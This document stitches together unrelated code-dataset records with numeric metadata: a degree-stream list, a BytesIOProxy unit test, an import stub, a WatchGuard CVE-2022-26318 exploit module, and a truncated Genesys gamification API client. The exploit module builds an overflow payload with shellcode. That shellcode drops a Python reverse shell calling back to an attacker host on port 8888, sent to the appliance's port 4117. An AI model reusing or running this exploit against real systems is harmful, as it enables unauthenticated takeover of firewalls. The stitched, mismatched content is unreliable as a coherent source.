'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Life Science (5 Years, Integrated Master of Science)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Chemistry (5 Years, Integrated Master of Science)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Bio Medical Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Metallurgical and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Chemistry (5 Years, Bachelor of Science and Master of Science (DualDegree))' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Computer Science and Engineering (4 Years, Bachelor of Technology)' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Computer Engineering (4 Years, Bachelor of Technology)' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Information Technology (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Instrumentation Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Metallurgy and Materials Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Chemical Engineering (4 Years, Bachelor of Technology)' ,
'Electronics and Communication Engineering (4 Years, Bachelor ofTechnology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Electrical and Instrumentation Engineering (4 Years, Bachelor ofTechnology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Electrical Engineering (4 Years, Bachelor of Technology)' ,
'Instrumentation and Control Engineering (4 Years, Bachelor ofTechnology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Manufacturing Engineering (4 Years, Bachelor of Technology)' ,
'Agricultural Engineering (4 Years, Bachelor of Technology)' ,
'Mechanical Engineering (4 Years, Bachelor of Technology)' ,
'Civil Engineering (4 Years, Bachelor of Technology)' ,
'Food Engineering and Technology (4 Years, Bachelor of Technology)' ,
'Carpet and Textile Technology (4 Years, Bachelor of Technology)' ,
'Industrial and Production Engineering (4 Years, Bachelor of Technology)' ,
'Food Technology (4 Years, Bachelor of Technology)' ,
'Food Technology (4 Years, Bachelor of Technology)' ,
'Food Engineering and Technology (4 Years, Bachelor of Technology)' ,
'Food Technology and Management (4 Years, Bachelor of Technology)' ,
]
"""import itertools
i = 1
for (colle , stre) in zip(colleges,Streams):
print(colle, stre)
i += 1
print(i)"""
| 61.241287
| 220
| 0.787068
| 5,205
| 45,686
| 6.908549
| 0.045341
| 0.166857
| 0.129258
| 0.205095
| 0.967101
| 0.942462
| 0.90859
| 0.876804
| 0.855002
| 0.787035
| 0
| 0.009226
| 0.129296
| 45,686
| 746
| 221
| 61.241287
| 0.894718
| 0
| 0
| 0.93188
| 0
| 0.010899
| 0.919163
| 0.013736
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
de0ff8359ff0698915c38c018a40776da150c11e
| 4,046
|
py
|
Python
|
arxiv/canonical/services/tests/test_readable.py
|
arXiv/arxiv-canonical
|
a758ed88a568f23a834288aed4dcf7039c1340cf
|
[
"MIT"
] | 5
|
2019-05-26T22:52:54.000Z
|
2021-11-05T12:27:11.000Z
|
arxiv/canonical/services/tests/test_readable.py
|
arXiv/arxiv-canonical
|
a758ed88a568f23a834288aed4dcf7039c1340cf
|
[
"MIT"
] | 31
|
2019-06-24T13:51:25.000Z
|
2021-11-12T22:27:10.000Z
|
arxiv/canonical/services/tests/test_readable.py
|
arXiv/arxiv-canonical
|
a758ed88a568f23a834288aed4dcf7039c1340cf
|
[
"MIT"
] | 4
|
2019-01-10T22:01:54.000Z
|
2021-11-05T12:26:58.000Z
|
import io

from unittest import TestCase, mock

from ..readable import BytesIOProxy


class TestBytesIOProxy(TestCase):
    def setUp(self):
        """Create a new BytesIOProxy."""
        self.test_content = b'test content'
        self.mock_read = mock.MagicMock()
        self.mock_read.return_value = self.test_content
        self.readable = BytesIOProxy(self.mock_read)

    def test_read(self):
        """Read from a :class:`BytesIOProxy`."""
        self.assertEqual(self.mock_read.call_count, 0,
                         'Passed callable not yet used')
        self.assertEqual(self.readable.read(), self.test_content,
                         'Content is read from passed callable')
        self.assertEqual(self.mock_read.call_count, 1,
                         'Passed callable has been used')

    def test_read_again(self):
        """Read more than once from a :class:`BytesIOProxy`."""
        self.assertEqual(self.mock_read.call_count, 0,
                         'Passed callable not yet used')
        self.assertEqual(self.readable.read(), self.test_content,
                         'Content is read from passed callable')
        self.assertEqual(self.mock_read.call_count, 1,
                         'Passed callable has been used')
        self.readable.seek(0)
        self.assertEqual(self.readable.read(), self.test_content,
                         'The same content is read')
        self.assertEqual(self.mock_read.call_count, 1,
                         'Passed callable is not called a second time')

    def test_not_closed_before_loading_content(self):
        """BytesIOProxy is not closed prior to loading content."""
        self.assertFalse(self.readable.closed, 'Readable is not closed')

    def test_not_closed_after_loading_content(self):
        """BytesIOProxy is not closed after loading content."""
        self.assertEqual(self.readable.read(), self.test_content,
                         'Content is read from passed callable')
        self.assertFalse(self.readable.closed, 'Readable is not closed')

    def test_closed_after_explicit_close(self):
        """BytesIOProxy is closed after being explicitly closed."""
        self.assertFalse(self.readable.closed, 'Readable is not closed')
        self.readable.close()
        self.assertTrue(self.readable.closed, 'Readable is closed')

    def test_closed_after_read_and_explicit_close(self):
        """BytesIOProxy is closed after being explicitly closed."""
        self.assertEqual(self.readable.read(), self.test_content,
                         'Content is read from passed callable')
        self.assertFalse(self.readable.closed, 'Readable is not closed')
        self.readable.close()
        self.assertTrue(self.readable.closed, 'Readable is closed')

    def test_readable_before_loading_content(self):
        """BytesIOProxy is readable prior to loading content."""
        self.assertTrue(self.readable.readable(), 'Readable is readable')

    def test_readable_after_loading_content(self):
        """BytesIOProxy is readable after loading content."""
        self.assertEqual(self.readable.read(), self.test_content,
                         'Content is read from passed callable')
        self.assertTrue(self.readable.readable(), 'Readable is readable')

    def test_not_readable_after_explicit_close(self):
        """BytesIOProxy is not readable after being explicitly closed."""
        self.assertTrue(self.readable.readable(), 'Readable is readable')
        self.readable.close()
        with self.assertRaises(ValueError):
            self.readable.readable()

    def test_not_readable_after_read_and_explicit_close(self):
        """BytesIOProxy is not readable after being explicitly closed."""
        self.assertEqual(self.readable.read(), self.test_content,
                         'Content is read from passed callable')
        self.assertTrue(self.readable.readable(), 'Readable is readable')
        self.readable.close()
        with self.assertRaises(ValueError):
            self.readable.readable()
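# Hedged sketch (not the actual arxiv.canonical implementation): a minimal
# BytesIOProxy consistent with the behaviour the tests above exercise -- the
# passed zero-argument callable is invoked once, lazily, on first read, and the
# object otherwise behaves like an ordinary BytesIO.
import io


class BytesIOProxy(io.BytesIO):
    """Buffer that loads its content from a callable on first read."""

    def __init__(self, read):
        super().__init__()
        self._read = read
        self._loaded = False

    def _load(self):
        # Populate the underlying buffer exactly once.
        if not self._loaded:
            self.write(self._read())
            self.seek(0)
            self._loaded = True

    def read(self, *args, **kwargs):
        self._load()
        return super().read(*args, **kwargs)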
| 47.046512
| 73
| 0.654968
| 469
| 4,046
| 5.509595
| 0.132196
| 0.116099
| 0.088235
| 0.073142
| 0.847136
| 0.823142
| 0.765093
| 0.733359
| 0.706269
| 0.706269
| 0
| 0.00197
| 0.247405
| 4,046
| 86
| 74
| 47.046512
| 0.846634
| 0.133712
| 0
| 0.645161
| 0
| 0
| 0.177681
| 0
| 0
| 0
| 0
| 0
| 0.387097
| 1
| 0.177419
| false
| 0.177419
| 0.048387
| 0
| 0.241935
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
a9cf9532ce34fe32da63ac38544622129d8143d1
| 77
|
py
|
Python
|
train/treegen/preprocess/__init__.py
|
dngu7/honeycode
|
d7a00408f8370f3fea8ca1a94b239f3e4d842a7d
|
[
"MIT"
] | 1
|
2021-03-25T10:11:21.000Z
|
2021-03-25T10:11:21.000Z
|
train/treegen/preprocess/__init__.py
|
dngu7/honeycode
|
d7a00408f8370f3fea8ca1a94b239f3e4d842a7d
|
[
"MIT"
] | null | null | null |
train/treegen/preprocess/__init__.py
|
dngu7/honeycode
|
d7a00408f8370f3fea8ca1a94b239f3e4d842a7d
|
[
"MIT"
] | 1
|
2020-11-20T00:13:16.000Z
|
2020-11-20T00:13:16.000Z
|
from preprocess import graph_loader
from preprocess import local_graph_loader
| 38.5
| 41
| 0.909091
| 11
| 77
| 6.090909
| 0.545455
| 0.41791
| 0.597015
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 77
| 2
| 41
| 38.5
| 0.957143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a9e2cdc30d31cd9ff7961adbfac292124af2b56d
| 5,324
|
py
|
Python
|
modules/cves/2022/CVE-2022-26318.py
|
cckuailong/pocsploit
|
fe4a3154e59d2bebd55ccfdf62f4f7efb21b5a2a
|
[
"MIT"
] | 106
|
2022-03-18T06:51:09.000Z
|
2022-03-31T19:11:41.000Z
|
modules/cves/2022/CVE-2022-26318.py
|
cckuailong/pocsploit
|
fe4a3154e59d2bebd55ccfdf62f4f7efb21b5a2a
|
[
"MIT"
] | 5
|
2022-03-27T07:37:32.000Z
|
2022-03-31T13:56:11.000Z
|
modules/cves/2022/CVE-2022-26318.py
|
cckuailong/pocsploit
|
fe4a3154e59d2bebd55ccfdf62f4f7efb21b5a2a
|
[
"MIT"
] | 30
|
2022-03-21T01:27:08.000Z
|
2022-03-31T12:28:01.000Z
|
import socket
import ssl
import gzip
from urllib.parse import urlparse
from plugins.oob import gen_oob_domain, verify_request
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''WatchGuard Unauth RCE''',
"description": '''On WatchGuard Firebox and XTM appliances, an unauthenticated user can execute arbitrary code, aka FBX-22786. This vulnerability impacts Fireware OS before 12.7.2_U2, 12.x before 12.1.3_U8, and 12.2.x through 12.5.x before 12.5.9_U2.''',
"severity": "critical",
"references": [
"https://nvd.nist.gov/vuln/detail/CVE-2022-26318",
"https://github.com/Throns1956/watchguard_cve-2022-26318"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "9.8",
"cve-id": "CVE-2022-26318",
"cwe-id": ""
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2022", "watchguard", "rce", "unauth"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
url = format_url(url)
o = urlparse(url)
host = o.hostname
oob_domain, flag = gen_oob_domain()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
wrappedSocket = ssl.wrap_socket(sock=sock, cert_reqs=ssl.CERT_NONE)
server_address = (host, 4117)
wrappedSocket.settimeout(3)
try:
wrappedSocket.connect(server_address)
payload = buildHTTP(oob_domain, host)
wrappedSocket.sendall(payload)
if verify_request("dns", flag):
result["success"] = True
result["info"] = info()
result["payload"] = url
except:
result["success"] = False
finally:
wrappedSocket.close()
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
def buildPayload(L_HOST):
payload = "<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><".encode()
payload += ("A"*3181).encode()
payload += "MFA>".encode()
payload += ("<BBBBMFA>"*3680).encode()
payload += b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 P@\x00\x00\x00\x00\x00h\xf9@\x00\x00\x00\x00\x00 P@\x00\x00\x00\x00\x00\x00\x00\x0e\xd6A\x00\x00\x00\x00\x00\xb1\xd5A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00}^@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00|^@\x00\x00\x00\x00\x00\xad\xd2A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\xd6A\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00*\xa9@\x00\x00\x00\x00\x00H\x8d=\x9d\x00\x00\x00\xbeA\x02\x00\x00\xba\xb6\x01\x00\x00\xb8\x02\x00\x00\x00\x0f\x05H\x89\x05\x92\x00\x00\x00H\x8b\x15\x93\x00\x00\x00H\x8d5\x94\x00\x00\x00H\x8b=}\x00\x00\x00\xb8\x01\x00\x00\x00\x0f\x05H\x8b=o\x00\x00\x00\xb8\x03\x00\x00\x00\x0f\x05\xb8;\x00\x00\x00H\x8d=?\x00\x00\x00H\x89= \x00\x00\x00H\x8d5A\x00\x00\x00H\x895\x1a\x00\x00\x00H\x8d5\x0b\x00\x00\x001\xd2\x0f\x05\xb8<\x00\x00\x00\x0f\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00/usr/bin/python\x00/tmp/test.py\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef\x01\x00\x00\x00\x00\x00\x00'
payload += 'import socket;from subprocess import call; from os import dup2;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{}",8888)); dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);call(["/bin/python","-i"]);'.format(L_HOST).encode()
return gzip.compress(payload, 9)
def buildHTTP(L_HOST, R_HOST):
http_payload = "POST /agent/login HTTP/1.1\r\n"
http_payload += "Host: {}:4117\r\n".format(R_HOST)
http_payload += "User-Agent: CVE-2022-26318\r\n"
http_payload += "Accept-Encoding: gzip, deflate\r\n"
http_payload += "Accept: */*\r\n"
http_payload += "Connection: close\r\n"
http_payload += "Content-Encoding: gzip\r\n"
gzippedExploit = buildPayload(L_HOST)
http_payload += "Content-Length: {}\r\n".format(len(gzippedExploit))
http_payload += "\r\n"
return http_payload.encode() + gzippedExploit
| 51.192308
| 2,038
| 0.665665
| 926
| 5,324
| 3.785097
| 0.240821
| 0.662482
| 0.914123
| 1.150357
| 0.384308
| 0.344936
| 0.3398
| 0.3398
| 0.316976
| 0.309272
| 0
| 0.226641
| 0.135612
| 5,324
| 104
| 2,039
| 51.192308
| 0.534985
| 0.016529
| 0
| 0
| 0
| 0.063291
| 0.606959
| 0.435863
| 0
| 0
| 0
| 0
| 0
| 1
| 0.088608
| false
| 0
| 0.075949
| 0.037975
| 0.253165
| 0.012658
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e72aba29ed16bbe711a36191cfd2cdbda7ef4f99
| 118,597
|
py
|
Python
|
libs/PureCloudPlatformClientV2/apis/gamification_api.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | 1
|
2021-10-08T20:46:45.000Z
|
2021-10-08T20:46:45.000Z
|
libs/PureCloudPlatformClientV2/apis/gamification_api.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | null | null | null |
libs/PureCloudPlatformClientV2/apis/gamification_api.py
|
rocketbot-cl/genesysCloud
|
dd9d9b5ebb90a82bab98c0d88b9585c22c91f333
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
GamificationApi.py
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class GamificationApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def get_gamification_leaderboard(self, start_workday, end_workday, **kwargs):
"""
Leaderboard of the requesting user's division
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_leaderboard(start_workday, end_workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param date start_workday: Start workday to retrieve for the leaderboard. Dates are represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param date end_workday: End workday to retrieve for the leaderboard. Dates are represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param str metric_id: Metric Id for which the leaderboard is to be generated. The total points is used if nothing is given.
:return: Leaderboard
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_workday', 'end_workday', 'metric_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_leaderboard" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'start_workday' is set
if ('start_workday' not in params) or (params['start_workday'] is None):
raise ValueError("Missing the required parameter `start_workday` when calling `get_gamification_leaderboard`")
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_leaderboard`")
resource_path = '/api/v2/gamification/leaderboard'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'start_workday' in params:
query_params['startWorkday'] = params['start_workday']
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
if 'metric_id' in params:
query_params['metricId'] = params['metric_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Leaderboard',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_leaderboard_all(self, filter_type, filter_id, start_workday, end_workday, **kwargs):
"""
Leaderboard by division
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_leaderboard_all(filter_type, filter_id, start_workday, end_workday, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter_type: Filter type for the query request. (required)
:param str filter_id: ID for the filter type. For example, division Id (required)
:param date start_workday: Start workday to retrieve for the leaderboard. Dates are represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param date end_workday: End workday to retrieve for the leaderboard. Dates are represented as an ISO-8601 string. For example: yyyy-MM-dd (required)
:param str metric_id: Metric Id for which the leaderboard is to be generated. The total points is used if nothing is given.
:return: Leaderboard
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter_type', 'filter_id', 'start_workday', 'end_workday', 'metric_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_leaderboard_all" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'filter_type' is set
if ('filter_type' not in params) or (params['filter_type'] is None):
raise ValueError("Missing the required parameter `filter_type` when calling `get_gamification_leaderboard_all`")
# verify the required parameter 'filter_id' is set
if ('filter_id' not in params) or (params['filter_id'] is None):
raise ValueError("Missing the required parameter `filter_id` when calling `get_gamification_leaderboard_all`")
# verify the required parameter 'start_workday' is set
if ('start_workday' not in params) or (params['start_workday'] is None):
raise ValueError("Missing the required parameter `start_workday` when calling `get_gamification_leaderboard_all`")
# verify the required parameter 'end_workday' is set
if ('end_workday' not in params) or (params['end_workday'] is None):
raise ValueError("Missing the required parameter `end_workday` when calling `get_gamification_leaderboard_all`")
resource_path = '/api/v2/gamification/leaderboard/all'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'filter_type' in params:
query_params['filterType'] = params['filter_type']
if 'filter_id' in params:
query_params['filterId'] = params['filter_id']
if 'start_workday' in params:
query_params['startWorkday'] = params['start_workday']
if 'end_workday' in params:
query_params['endWorkday'] = params['end_workday']
if 'metric_id' in params:
query_params['metricId'] = params['metric_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Leaderboard',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_leaderboard_all_bestpoints(self, filter_type, filter_id, **kwargs):
"""
Best Points by division
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_leaderboard_all_bestpoints(filter_type, filter_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str filter_type: Filter type for the query request. (required)
:param str filter_id: ID for the filter type. For example, division Id (required)
:return: OverallBestPoints
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['filter_type', 'filter_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_leaderboard_all_bestpoints" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'filter_type' is set
if ('filter_type' not in params) or (params['filter_type'] is None):
raise ValueError("Missing the required parameter `filter_type` when calling `get_gamification_leaderboard_all_bestpoints`")
# verify the required parameter 'filter_id' is set
if ('filter_id' not in params) or (params['filter_id'] is None):
raise ValueError("Missing the required parameter `filter_id` when calling `get_gamification_leaderboard_all_bestpoints`")
resource_path = '/api/v2/gamification/leaderboard/all/bestpoints'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'filter_type' in params:
query_params['filterType'] = params['filter_type']
if 'filter_id' in params:
query_params['filterId'] = params['filter_id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OverallBestPoints',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_leaderboard_bestpoints(self, **kwargs):
"""
Best Points of the requesting user's division
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_leaderboard_bestpoints(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: OverallBestPoints
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_leaderboard_bestpoints" % key
)
params[key] = val
del params['kwargs']
resource_path = '/api/v2/gamification/leaderboard/bestpoints'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OverallBestPoints',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def get_gamification_metric(self, metric_id, **kwargs):
"""
Gamified metric by id
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_gamification_metric(metric_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str metric_id: metric Id (required)
:return: Metric
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['metric_id']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_gamification_metric" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'metric_id' is set
if ('metric_id' not in params) or (params['metric_id'] is None):
raise ValueError("Missing the required parameter `metric_id` when calling `get_gamification_metric`")
resource_path = '/api/v2/gamification/metrics/{metricId}'.replace('{format}', 'json')
path_params = {}
if 'metric_id' in params:
path_params['metricId'] = params['metric_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Metric',
